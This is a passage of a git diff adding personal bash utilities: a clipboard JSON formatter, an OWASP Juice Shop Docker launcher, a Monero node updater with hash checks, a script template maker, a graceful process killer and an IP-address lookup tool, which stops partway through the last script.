echo -e " \033[0;36m-c, --compact\033[0m Compact JSON (remove whitespace)"
|
||||||
|
echo -e " \033[0;36m-i, --stdin\033[0m Read from stdin instead of clipboard"
|
||||||
|
echo -e " \033[0;36m-o, --output\033[0m Write to clipboard (default: stdout)"
|
||||||
|
echo -e " \033[0;36m-h, --help\033[0m Show this help message"
|
||||||
|
echo
|
||||||
|
echo -e "\033[1mEXAMPLES:\033[0m"
|
||||||
|
echo " jj # Format clipboard JSON"
|
||||||
|
echo " jj '.users[0].name' # Query clipboard with jq"
|
||||||
|
echo " jj -v # Validate clipboard JSON"
|
||||||
|
echo " jj -f data.json # Format file in place"
|
||||||
|
echo " jj -c # Compact clipboard JSON"
|
||||||
|
echo " cat file.json | jj # Format from stdin"
|
||||||
|
echo " curl api.com | jj '.data' # Query API response"
|
||||||
|
echo
|
||||||
|
echo -e "\033[1mNOTE:\033[0m"
|
||||||
|
echo " Requires jq to be installed for querying"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Clipboard functions
|
||||||
|
clip_get() {
|
||||||
|
if command -v xsel &>/dev/null; then
|
||||||
|
xsel --output --clipboard
|
||||||
|
elif command -v xclip &>/dev/null; then
|
||||||
|
xclip -selection clipboard -o
|
||||||
|
else
|
||||||
|
echo "Error: No clipboard tool found" >&2
|
||||||
|
return 1
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
clip_set() {
|
||||||
|
if command -v xsel &>/dev/null; then
|
||||||
|
xsel --input --clipboard
|
||||||
|
elif command -v xclip &>/dev/null; then
|
||||||
|
xclip -selection clipboard
|
||||||
|
else
|
||||||
|
echo "Error: No clipboard tool found" >&2
|
||||||
|
return 1
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Get input (clipboard or stdin)
|
||||||
|
get_input() {
|
||||||
|
if [[ "${use_stdin}" == "true" ]] || [[ ! -t 0 ]]; then
|
||||||
|
# Use stdin if explicitly requested OR if stdin is not a terminal (piped)
|
||||||
|
cat
|
||||||
|
else
|
||||||
|
clip_get
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Validate JSON
|
||||||
|
validate_json() {
|
||||||
|
local input=$1
|
||||||
|
if echo "$input" | jq empty 2>/dev/null; then
|
||||||
|
echo -e "\033[0;32m✓\033[0m Valid JSON"
|
||||||
|
return 0
|
||||||
|
else
|
||||||
|
echo -e "\033[0;31m✗\033[0m Invalid JSON:" >&2
|
||||||
|
echo "$input" | jq empty 2>&1 | sed 's/^/ /' >&2
|
||||||
|
return 1
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Format JSON (pretty print)
|
||||||
|
format_json() {
|
||||||
|
local input=$1
|
||||||
|
echo "$input" | jq .
|
||||||
|
}
|
||||||
|
|
||||||
|
# Compact JSON
|
||||||
|
compact_json() {
|
||||||
|
local input=$1
|
||||||
|
echo "$input" | jq -c .
|
||||||
|
}
|
||||||
|
|
||||||
|
# Query JSON with jq
|
||||||
|
query_json() {
|
||||||
|
local input=$1
|
||||||
|
local query=$2
|
||||||
|
echo "$input" | jq "$query"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Parse arguments
|
||||||
|
mode="format"
|
||||||
|
use_stdin=false
|
||||||
|
to_clipboard=false
|
||||||
|
file_path=""
|
||||||
|
jq_query=""
|
||||||
|
|
||||||
|
while [[ $# -gt 0 ]]; do
|
||||||
|
case $1 in
|
||||||
|
-v|--validate)
|
||||||
|
mode="validate"
|
||||||
|
shift
|
||||||
|
;;
|
||||||
|
-f|--file)
|
||||||
|
mode="file"
|
||||||
|
file_path="$2"
|
||||||
|
shift 2
|
||||||
|
;;
|
||||||
|
-c|--compact)
|
||||||
|
mode="compact"
|
||||||
|
shift
|
||||||
|
;;
|
||||||
|
-i|--stdin)
|
||||||
|
use_stdin=true
|
||||||
|
shift
|
||||||
|
;;
|
||||||
|
-o|--output)
|
||||||
|
to_clipboard=true
|
||||||
|
shift
|
||||||
|
;;
|
||||||
|
-h|--help)
|
||||||
|
show_help
|
||||||
|
exit 0
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
# Assume it's a jq query
|
||||||
|
jq_query="$1"
|
||||||
|
mode="query"
|
||||||
|
shift
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
done
|
||||||
|
|
||||||
|
# Check if jq is installed
|
||||||
|
if ! command -v jq &>/dev/null; then
|
||||||
|
echo -e "\033[0;31mError:\033[0m jq is not installed" >&2
|
||||||
|
echo "Install it with: sudo apt install jq" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Main logic
|
||||||
|
case "$mode" in
|
||||||
|
validate)
|
||||||
|
input=$(get_input)
|
||||||
|
validate_json "$input"
|
||||||
|
;;
|
||||||
|
|
||||||
|
file)
|
||||||
|
if [[ ! -f "$file_path" ]]; then
|
||||||
|
echo -e "\033[0;31mError:\033[0m File not found: $file_path" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Validate first
|
||||||
|
if ! jq empty "$file_path" 2>/dev/null; then
|
||||||
|
echo -e "\033[0;31mError:\033[0m Invalid JSON in file" >&2
|
||||||
|
jq empty "$file_path" 2>&1 | sed 's/^/ /' >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Format in place
|
||||||
|
temp_file=$(mktemp)
|
||||||
|
jq . "$file_path" > "$temp_file"
|
||||||
|
mv "$temp_file" "$file_path"
|
||||||
|
echo -e "\033[0;32m✓\033[0m Formatted: $file_path"
|
||||||
|
;;
|
||||||
|
|
||||||
|
compact)
|
||||||
|
input=$(get_input)
|
||||||
|
output=$(compact_json "$input")
|
||||||
|
|
||||||
|
if [[ "$to_clipboard" == "true" ]]; then
|
||||||
|
echo -n "$output" | clip_set
|
||||||
|
echo -e "\033[0;32m✓\033[0m Copied compacted JSON to clipboard"
|
||||||
|
else
|
||||||
|
echo "$output"
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
|
||||||
|
query)
|
||||||
|
input=$(get_input)
|
||||||
|
output=$(query_json "$input" "$jq_query")
|
||||||
|
|
||||||
|
if [[ "$to_clipboard" == "true" ]]; then
|
||||||
|
echo -n "$output" | clip_set
|
||||||
|
echo -e "\033[0;32m✓\033[0m Copied query result to clipboard"
|
||||||
|
else
|
||||||
|
echo "$output"
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
|
||||||
|
format)
|
||||||
|
input=$(get_input)
|
||||||
|
output=$(format_json "$input")
|
||||||
|
|
||||||
|
if [[ "$to_clipboard" == "true" ]]; then
|
||||||
|
echo -n "$output" | clip_set
|
||||||
|
echo -e "\033[0;32m✓\033[0m Copied formatted JSON to clipboard"
|
||||||
|
else
|
||||||
|
echo "$output"
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
esac
|
||||||
172
scripts/jshop
Executable file
172
scripts/jshop
Executable file
|
|
@ -0,0 +1,172 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: jshop
|
||||||
|
# Description: OWASP Juice Shop launcher
|
||||||
|
# Usage: jshop start|stop|status|logs
|
||||||
|
|
||||||
|
VERSION="1.0.0"
|
||||||
|
|
||||||
|
# Colors
|
||||||
|
readonly RED='\033[0;31m'
|
||||||
|
readonly GREEN='\033[0;32m'
|
||||||
|
readonly YELLOW='\033[1;33m'
|
||||||
|
readonly CYAN='\033[0;36m'
|
||||||
|
readonly BOLD='\033[1m'
|
||||||
|
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
CONTAINER_NAME="juice-shop"
|
||||||
|
IMAGE="bkimminich/juice-shop"
|
||||||
|
DEFAULT_PORT="3000"
|
||||||
|
|
||||||
|
# Find available port
|
||||||
|
find_available_port() {
|
||||||
|
local port="${1:-3000}"
|
||||||
|
while lsof -Pi :$port -sTCP:LISTEN -t >/dev/null 2>&1 || sudo netstat -tuln | grep -q ":$port "; do
|
||||||
|
echo -e "${YELLOW}⚠${NC} Port $port in use, trying next..." >&2
|
||||||
|
port=$((port + 1))
|
||||||
|
done
|
||||||
|
echo "$port"
|
||||||
|
}
|
||||||
|
|
||||||
|
show_help() {
|
||||||
|
echo -e "${BOLD}jshop${NC} - OWASP Juice Shop Launcher v${VERSION}"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}USAGE:${NC}"
|
||||||
|
echo " jshop <command>"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}COMMANDS:${NC}"
|
||||||
|
echo -e " ${CYAN}start${NC} Start Juice Shop"
|
||||||
|
echo -e " ${CYAN}stop${NC} Stop Juice Shop"
|
||||||
|
echo -e " ${CYAN}restart${NC} Restart Juice Shop"
|
||||||
|
echo -e " ${CYAN}status${NC} Check if running"
|
||||||
|
echo -e " ${CYAN}logs${NC} Show container logs"
|
||||||
|
echo -e " ${CYAN}shell${NC} Open shell in container"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||||
|
echo " jshop start # Launch Juice Shop"
|
||||||
|
echo " jshop stop # Stop Juice Shop"
|
||||||
|
echo " jshop logs # View logs"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}ACCESS:${NC}"
|
||||||
|
echo " URL: ${BOLD}http://localhost:\$PORT${NC} (auto-detects available port)"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}ABOUT:${NC}"
|
||||||
|
echo " OWASP Juice Shop - Intentionally insecure web application"
|
||||||
|
echo " Perfect for testing: XSS, SQLi, auth bypass, IDOR, etc."
|
||||||
|
echo " Docs: https://pwning.owasp-juice.shop/"
|
||||||
|
}
|
||||||
|
|
||||||
|
check_docker() {
|
||||||
|
if ! command -v docker &>/dev/null; then
|
||||||
|
echo -e "${RED}Error:${NC} Docker not installed"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
start_jshop() {
|
||||||
|
# Find available port only when starting
|
||||||
|
PORT=$(find_available_port "$DEFAULT_PORT")
|
||||||
|
|
||||||
|
if docker ps -a --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||||
|
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||||
|
echo -e "${YELLOW}⚠${NC} Juice Shop already running"
|
||||||
|
CURRENT_PORT=$(docker port "$CONTAINER_NAME" 3000 | cut -d: -f2)
|
||||||
|
echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://localhost:${CURRENT_PORT}${NC}"
|
||||||
|
return 0
|
||||||
|
else
|
||||||
|
echo -e "${CYAN}[*]${NC} Starting existing container..."
|
||||||
|
docker start "$CONTAINER_NAME"
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
echo -e "${CYAN}[*]${NC} Pulling ${IMAGE}..."
|
||||||
|
docker pull "$IMAGE"
|
||||||
|
echo -e "${CYAN}[*]${NC} Starting Juice Shop..."
|
||||||
|
docker run -d --name "$CONTAINER_NAME" -p "${PORT}:3000" "$IMAGE"
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "${GREEN}✓${NC} Juice Shop started"
|
||||||
|
if [[ "$PORT" != "$DEFAULT_PORT" ]]; then
|
||||||
|
echo -e "${YELLOW}⚠${NC} Using port ${PORT} (default ${DEFAULT_PORT} was in use)"
|
||||||
|
fi
|
||||||
|
echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://localhost:${PORT}${NC}"
|
||||||
|
}
|
||||||
|
|
||||||
|
stop_jshop() {
|
||||||
|
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||||
|
echo -e "${CYAN}[*]${NC} Stopping Juice Shop..."
|
||||||
|
docker stop "$CONTAINER_NAME"
|
||||||
|
echo -e "${GREEN}✓${NC} Juice Shop stopped"
|
||||||
|
else
|
||||||
|
echo -e "${YELLOW}⚠${NC} Juice Shop not running"
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
restart_jshop() {
|
||||||
|
stop_jshop
|
||||||
|
sleep 2
|
||||||
|
start_jshop
|
||||||
|
}
|
||||||
|
|
||||||
|
show_status() {
|
||||||
|
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||||
|
echo -e "${GREEN}●${NC} Juice Shop is ${GREEN}running${NC}"
|
||||||
|
CURRENT_PORT=$(docker port "$CONTAINER_NAME" 3000 2>/dev/null | cut -d: -f2)
|
||||||
|
echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://localhost:${CURRENT_PORT}${NC}"
|
||||||
|
docker ps --format "table {{.Names}}\t{{.Status}}\t{{.Ports}}" | grep -E "(NAMES|${CONTAINER_NAME})"
|
||||||
|
else
|
||||||
|
echo -e "${RED}●${NC} Juice Shop is ${RED}stopped${NC}"
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
show_logs() {
|
||||||
|
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||||
|
docker logs -f "$CONTAINER_NAME"
|
||||||
|
else
|
||||||
|
echo -e "${RED}Error:${NC} Juice Shop not running"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
open_shell() {
|
||||||
|
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||||
|
docker exec -it "$CONTAINER_NAME" /bin/sh
|
||||||
|
else
|
||||||
|
echo -e "${RED}Error:${NC} Juice Shop not running"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Main
|
||||||
|
check_docker
|
||||||
|
|
||||||
|
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||||
|
show_help
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
case "$1" in
|
||||||
|
start|up)
|
||||||
|
start_jshop
|
||||||
|
;;
|
||||||
|
stop|down)
|
||||||
|
stop_jshop
|
||||||
|
;;
|
||||||
|
restart)
|
||||||
|
restart_jshop
|
||||||
|
;;
|
||||||
|
status)
|
||||||
|
show_status
|
||||||
|
;;
|
||||||
|
logs)
|
||||||
|
show_logs
|
||||||
|
;;
|
||||||
|
shell|sh|bash)
|
||||||
|
open_shell
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
echo -e "${RED}Error:${NC} Unknown command: $1"
|
||||||
|
echo "Run 'jshop --help' for usage"
|
||||||
|
exit 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
52
scripts/md_update.sh
Executable file
52
scripts/md_update.sh
Executable file
|
|
@ -0,0 +1,52 @@
|
||||||
|
#!/bin/bash
|
||||||
|
set -evo pipefail
|
||||||
|
|
||||||
|
echo "[*] Monero Updating"
|
||||||
|
echo "[-] Removing old monero binaries..."
|
||||||
|
rm -rf monero-*-linux-*
|
||||||
|
|
||||||
|
echo -e "[*] Checking architecture..."
|
||||||
|
|
||||||
|
if [[ $(arch) = "x86_64" ]]; then
|
||||||
|
# Download latest 64-bit binaries
|
||||||
|
echo "[*] Download latest Linux binaries..."
|
||||||
|
wget -q --content-disposition https://downloads.getmonero.org/cli/linux64
|
||||||
|
elif [[ $(arch) = "aarch64" || $(arch) = "aarm64" || $(arch) = "armv8" ]]; then
|
||||||
|
# Download latest armv8 binaries
|
||||||
|
echo "[*] Download latest Linux Arm8 binaries..."
|
||||||
|
wget -q --content-disposition https://downloads.getmonero.org/cli/linuxarm8
|
||||||
|
elif [[ $(arch) = "armv71" ]]; then
|
||||||
|
# Download latest armv7 binaries
|
||||||
|
echo "[*] Download latest Linux Arm7 binaries..."
|
||||||
|
wget -q --content-disposition https://downloads.getmonero.org/cli/linuxarm7
|
||||||
|
else
|
||||||
|
echo -e "\e[31m[!] ERROR: Architecture not found. Please see https://www.getmonero.org/downloads/ to download manually.\e[0m"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Verify shasum of downloaded binaries
|
||||||
|
echo "[*] Verifying hashes of downloaded binaries..."
|
||||||
|
if shasum -a 256 -c hashes.txt -s --ignore-missing
|
||||||
|
then
|
||||||
|
echo
|
||||||
|
echo "[~] Success: The downloaded binaries verified properly!"
|
||||||
|
else
|
||||||
|
echo
|
||||||
|
echo -e "\e[31m[!] DANGER: The download binaries have been tampered with or corrupted.\e[0m"
|
||||||
|
rm -rf monero-linux-*.tar.bz2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo "[~] Extracting new monero binaries..."
|
||||||
|
tar xvf monero-linux-*.tar.bz2
|
||||||
|
rm monero-linux-*.tar.bz2
|
||||||
|
|
||||||
|
echo "[-] Stopping monerod..."
|
||||||
|
sudo systemctl stop monerod
|
||||||
|
|
||||||
|
echo "[~] Copying binaries to /usr/local/bin/"
|
||||||
|
sudo cp -r monero-*-linux-*/* /usr/local/bin/
|
||||||
|
sudo chown -R monero:monero /usr/local/bin/monero*
|
||||||
|
|
||||||
|
echo "[+] Starting monerod..."
|
||||||
|
sudo systemctl start monerod
|
||||||
24
scripts/mksh
Executable file
24
scripts/mksh
Executable file
|
|
@ -0,0 +1,24 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: mksh
|
||||||
|
# Description: Rapidly create executable bash scripts with template
|
||||||
|
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||||
|
|
||||||
|
if [[ $# -ne 1 ]]; then
|
||||||
|
echo 'mksh takes one argument' >&2
|
||||||
|
exit 1
|
||||||
|
elif [[ -e "$1" ]]; then
|
||||||
|
echo "$1 already exists" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
cat > "$1" << 'EOF'
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
EOF
|
||||||
|
|
||||||
|
chmod +x "$1"
|
||||||
|
|
||||||
|
"${EDITOR:-vim}" "$1"
|
||||||
124
scripts/murder
Executable file
124
scripts/murder
Executable file
|
|
@ -0,0 +1,124 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: murder
|
||||||
|
# Description: Gracefully terminate processes with escalating signals
|
||||||
|
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||||
|
# Credit: Evan Hahn - https://codeberg.org/EvanHahn/dotfiles
|
||||||
|
# Usage: murder 1234 # kill PID
|
||||||
|
# murder :8080 # kill process on port 8080
|
||||||
|
# murder firefox # kill process by name
|
||||||
|
# murder # interactive fzf picker (integrated with your k alias!)
|
||||||
|
|
||||||
|
# Signal escalation: [signal, wait_seconds]
|
||||||
|
# SIGTERM (15) -> SIGINT (2) -> SIGHUP (1) -> SIGKILL (9)
|
||||||
|
SIGNALS=("15 3" "2 3" "1 4" "9 0")
|
||||||
|
|
||||||
|
murder_pid() {
|
||||||
|
local pid=$1
|
||||||
|
|
||||||
|
if ! ps -p "$pid" > /dev/null 2>&1; then
|
||||||
|
echo "Process $pid not found" >&2
|
||||||
|
return 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
local process_name=$(ps -p "$pid" -o comm= 2>/dev/null || echo "unknown")
|
||||||
|
echo "Terminating $process_name (PID: $pid)..."
|
||||||
|
|
||||||
|
for sig_wait in "${SIGNALS[@]}"; do
|
||||||
|
read -r sig wait <<< "$sig_wait"
|
||||||
|
|
||||||
|
if ! ps -p "$pid" > /dev/null 2>&1; then
|
||||||
|
echo "✓ Process terminated successfully"
|
||||||
|
return 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
case $sig in
|
||||||
|
15) echo " → Sending SIGTERM (polite shutdown)..." ;;
|
||||||
|
2) echo " → Sending SIGINT (interrupt)..." ;;
|
||||||
|
1) echo " → Sending SIGHUP (hangup)..." ;;
|
||||||
|
9) echo " → Sending SIGKILL (force kill)..." ;;
|
||||||
|
esac
|
||||||
|
|
||||||
|
kill -"$sig" "$pid" 2>/dev/null || true
|
||||||
|
|
||||||
|
if [[ $wait -gt 0 ]]; then
|
||||||
|
sleep "$wait"
|
||||||
|
fi
|
||||||
|
done
|
||||||
|
|
||||||
|
if ps -p "$pid" > /dev/null 2>&1; then
|
||||||
|
echo "✗ Failed to terminate process" >&2
|
||||||
|
return 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo "✓ Process terminated"
|
||||||
|
}
|
||||||
|
|
||||||
|
# If no arguments, use fzf to select process (like your k alias!)
|
||||||
|
if [[ $# -eq 0 ]]; then
|
||||||
|
if ! command -v fzf &>/dev/null; then
|
||||||
|
echo "Error: fzf not found. Install fzf or provide PID/name/port as argument." >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
selected=$(ps aux | fzf --header="Select process to terminate (graceful escalation)" \
|
||||||
|
--header-lines=1 \
|
||||||
|
--preview='echo "Will attempt: SIGTERM → SIGINT → SIGHUP → SIGKILL"')
|
||||||
|
|
||||||
|
if [[ -n "$selected" ]]; then
|
||||||
|
pid=$(echo "$selected" | awk '{print $2}')
|
||||||
|
murder_pid "$pid"
|
||||||
|
fi
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Parse argument: PID, :port, or process name
|
||||||
|
arg="$1"
|
||||||
|
|
||||||
|
if [[ "$arg" =~ ^[0-9]+$ ]]; then
|
||||||
|
# Argument is a PID
|
||||||
|
murder_pid "$arg"
|
||||||
|
elif [[ "$arg" =~ ^:[0-9]+$ ]]; then
|
||||||
|
# Argument is a port (e.g., :8080)
|
||||||
|
port="${arg:1}"
|
||||||
|
pid=$(lsof -ti ":$port" 2>/dev/null || true)
|
||||||
|
|
||||||
|
if [[ -z "$pid" ]]; then
|
||||||
|
echo "No process found listening on port $port" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo "Found process on port $port:"
|
||||||
|
ps -p "$pid" -o pid,comm,args | tail -1
|
||||||
|
murder_pid "$pid"
|
||||||
|
else
|
||||||
|
# Argument is a process name
|
||||||
|
pids=$(pgrep -f "$arg" || true)
|
||||||
|
|
||||||
|
if [[ -z "$pids" ]]; then
|
||||||
|
echo "No processes found matching: $arg" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# If multiple processes, show list and let user choose
|
||||||
|
count=$(echo "$pids" | wc -l)
|
||||||
|
if [[ $count -gt 1 ]]; then
|
||||||
|
echo "Multiple processes found matching '$arg':"
|
||||||
|
ps -p $pids -o pid,comm,args
|
||||||
|
|
||||||
|
if command -v fzf &>/dev/null; then
|
||||||
|
selected=$(ps -p $pids | fzf --header-lines=1)
|
||||||
|
if [[ -n "$selected" ]]; then
|
||||||
|
pid=$(echo "$selected" | awk '{print $1}')
|
||||||
|
murder_pid "$pid"
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
echo -n "Enter PID to terminate: "
|
||||||
|
read pid
|
||||||
|
murder_pid "$pid"
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
murder_pid "$pids"
|
||||||
|
fi
|
||||||
|
fi
|
||||||
248
scripts/myip
Executable file
248
scripts/myip
Executable file
|
|
@ -0,0 +1,248 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: myip
|
||||||
|
# Description: Show external and internal IP addresses with optional features
|
||||||
|
# Usage: myip # Show all IPs
|
||||||
|
# myip -e # External IP only
|
||||||
|
# myip -i # Internal IPs only
|
||||||
|
# myip -c # Copy external IP to clipboard
|
||||||
|
# myip -j # JSON output
|
||||||
|
# myip -a # All info (IPs + gateway + DNS)
|
||||||
|
|
||||||
|
VERSION="1.0.0"
|
||||||
|
|
||||||
|
# Colors
|
||||||
|
readonly RED='\033[0;31m'
|
||||||
|
readonly GREEN='\033[0;32m'
|
||||||
|
readonly YELLOW='\033[1;33m'
|
||||||
|
readonly BLUE='\033[0;34m'
|
||||||
|
readonly CYAN='\033[0;36m'
|
||||||
|
readonly MAGENTA='\033[0;35m'
|
||||||
|
readonly BOLD='\033[1m'
|
||||||
|
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
show_help() {
|
||||||
|
echo -e "${BOLD}myip${NC} - IP Address Information Tool v${VERSION}"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}USAGE:${NC}"
|
||||||
|
echo " myip [OPTIONS]"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}OPTIONS:${NC}"
|
||||||
|
echo -e " ${CYAN}-e, --external${NC} Show external IP only"
|
||||||
|
echo -e " ${CYAN}-i, --internal${NC} Show internal IPs only"
|
||||||
|
echo -e " ${CYAN}-c, --copy${NC} Copy external IP to clipboard"
|
||||||
|
echo -e " ${CYAN}-j, --json${NC} Output as JSON"
|
||||||
|
echo -e " ${CYAN}-a, --all${NC} Show all network info (IPs + gateway + DNS)"
|
||||||
|
echo -e " ${CYAN}-h, --help${NC} Show this help message"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||||
|
echo " myip # Show both external and internal IPs"
|
||||||
|
echo " myip -e # External IP only"
|
||||||
|
echo " myip -c # Copy external IP to clipboard"
|
||||||
|
echo " myip -j # JSON format for scripting"
|
||||||
|
echo " myip -a # Complete network information"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}OUTPUT:${NC}"
|
||||||
|
echo " External IP, Internal IPs, Gateway (with -a), DNS servers (with -a)"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Get external IP with fallback sources
|
||||||
|
get_external_ip() {
|
||||||
|
local ip=""
|
||||||
|
|
||||||
|
# Try multiple sources for reliability
|
||||||
|
sources=(
|
||||||
|
"https://ifconfig.me"
|
||||||
|
"https://api.ipify.org"
|
||||||
|
"https://icanhazip.com"
|
||||||
|
"https://checkip.amazonaws.com"
|
||||||
|
)
|
||||||
|
|
||||||
|
for source in "${sources[@]}"; do
|
||||||
|
ip=$(curl -sf --max-time 3 "$source" 2>/dev/null | tr -d '[:space:]')
|
||||||
|
if [[ -n "$ip" ]] && [[ "$ip" =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
|
||||||
|
echo "$ip"
|
||||||
|
return 0
|
||||||
|
fi
|
||||||
|
done
|
||||||
|
|
||||||
|
echo "unable to fetch" >&2
|
||||||
|
return 1
|
||||||
|
}
|
||||||
|
|
||||||
|
# Get internal IPs
|
||||||
|
get_internal_ips() {
|
||||||
|
if command -v ip &>/dev/null; then
|
||||||
|
# Modern Linux
|
||||||
|
ip -4 addr show | grep -oP '(?<=inet\s)\d+(\.\d+){3}' | grep -v '127.0.0.1'
|
||||||
|
elif command -v ifconfig &>/dev/null; then
|
||||||
|
# macOS / older Linux
|
||||||
|
ifconfig | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*' | grep -v '127.0.0.1'
|
||||||
|
else
|
||||||
|
echo "No network tools found" >&2
|
||||||
|
return 1
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Get internal IPs with interface names
|
||||||
|
get_internal_ips_detailed() {
|
||||||
|
if command -v ip &>/dev/null; then
|
||||||
|
ip -4 addr show | awk '
|
||||||
|
/^[0-9]+:/ { iface = $2; gsub(/:/, "", iface) }
|
||||||
|
/inet / && !/127\.0\.0\.1/ {
|
||||||
|
split($2, a, "/")
|
||||||
|
print iface ":" a[1]
|
||||||
|
}
|
||||||
|
'
|
||||||
|
elif command -v ifconfig &>/dev/null; then
|
||||||
|
ifconfig | awk '
|
||||||
|
/^[a-z]/ { iface = $1; gsub(/:/, "", iface) }
|
||||||
|
/inet / && !/127\.0\.0\.1/ {
|
||||||
|
for (i=1; i<=NF; i++) {
|
||||||
|
if ($i == "inet") {
|
||||||
|
print iface ":" $(i+1)
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
'
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Get default gateway
|
||||||
|
get_gateway() {
|
||||||
|
if command -v ip &>/dev/null; then
|
||||||
|
ip route | grep default | awk '{print $3}' | head -1
|
||||||
|
elif command -v route &>/dev/null; then
|
||||||
|
route -n | grep '^0.0.0.0' | awk '{print $2}' | head -1
|
||||||
|
elif command -v netstat &>/dev/null; then
|
||||||
|
netstat -rn | grep default | awk '{print $2}' | head -1
|
||||||
|
else
|
||||||
|
echo "unknown"
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Get DNS servers
|
||||||
|
get_dns_servers() {
|
||||||
|
if [[ -f /etc/resolv.conf ]]; then
|
||||||
|
grep nameserver /etc/resolv.conf | awk '{print $2}' | tr '\n' ' '
|
||||||
|
else
|
||||||
|
echo "unknown"
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# JSON output
|
||||||
|
json_output() {
|
||||||
|
local external_ip=$(get_external_ip || echo "unknown")
|
||||||
|
local internal_ips=$(get_internal_ips | tr '\n' ',' | sed 's/,$//')
|
||||||
|
local gateway=$(get_gateway)
|
||||||
|
local dns=$(get_dns_servers)
|
||||||
|
|
||||||
|
cat << EOF
|
||||||
|
{
|
||||||
|
"external_ip": "$external_ip",
|
||||||
|
"internal_ips": [$( echo "$internal_ips" | sed 's/,/","/g; s/^/"/; s/$/"/' )],
|
||||||
|
"gateway": "$gateway",
|
||||||
|
"dns_servers": [$( echo "$dns" | sed 's/ /","/g; s/^/"/; s/$/"/' )]
|
||||||
|
}
|
||||||
|
EOF
|
||||||
|
}
|
||||||
|
|
||||||
|
# Colorized output
|
||||||
